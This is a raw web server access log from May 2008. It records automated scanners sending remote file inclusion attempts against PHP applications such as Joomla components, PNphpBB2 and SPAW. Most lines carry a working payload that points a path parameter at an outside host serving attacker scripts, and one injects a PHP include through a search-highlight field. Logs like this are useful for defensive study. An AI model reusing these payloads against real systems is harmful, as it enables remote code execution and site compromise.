85.214.56.123 - - [06/May/2008:10:38:10 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:38:12 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:38:17 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:38:19 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:38:19 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:10:38:29 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:10:38:29 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:38:39 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:38:40 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:39:08 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:39:08 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:39:18 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:39:19 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.56.123 - - [06/May/2008:10:39:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:39:45 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:39:52 -0700] "GET /logs/access_071212.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:39:52 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:39:52 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:39:58 -0700] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:40:00 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:40:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:40:03 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:40:06 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:40:08 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:40:08 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:40:12 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:40:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
216.239.69.227 - - [06/May/2008:10:40:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:40:16 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:40:16 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:40:24 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:40:24 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:40:27 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:40:27 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:40:28 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:40:28 -0700] "GET //index2.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:40:28 -0700] "GET /logs//index2.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:40:29 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:40:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:40:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:40:29 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:40:33 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:40:33 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:40:34 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:10:40:42 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:10:41:05 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:10:41:06 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:41:06 -0700] "GET /logs/access_080225.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:41:17 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:41:22 -0700] "GET /logs/access_080225.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:41:23 -0700] "GET /logs/access_080225.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:41:24 -0700] "GET /logs/access_080225.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:41:24 -0700] "GET //index2.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.239.69.227 - - [06/May/2008:10:41:37 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:41:40 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:10:42:10 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:10:42:10 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:42:14 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:42:20 -0700] "GET //~mlagnez3/components/com_messages/index.php?joomla=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:10:42:37 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:10:42:38 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:43:09 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:43:10 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:43:19 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:43:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:43:20 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:43:51 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:43:52 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:44:21 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:44:23 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:44:24 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:44:24 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:44:31 -0700] "GET /logs/access_080229.log/index2.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:44:32 -0700] "GET /logs/index2.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:10:44:36 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:44:39 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:44:39 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:44:39 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:44:52 -0700] "GET /logs/access_080308.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.230.251.145 - - [06/May/2008:10:44:53 -0700] "GET /logs/access.log//index.php?option=com_mtree&task=listalpha&http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.230.251.145 - - [06/May/2008:10:44:54 -0700] "GET /logs//index.php?option=com_mtree&task=listalpha&http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:45:39 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:45:43 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:45:47 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:45:47 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:45:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:45:58 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:45:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:46:00 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:46:01 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:46:04 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:46:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:46:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.56.123 - - [06/May/2008:10:46:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [06/May/2008:10:46:17 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.31 - - [06/May/2008:10:46:17 -0700] "GET /plans/?M=D HTTP/1.1" 200 1111 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:47:29 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:10:47:36 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:10:47:56 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
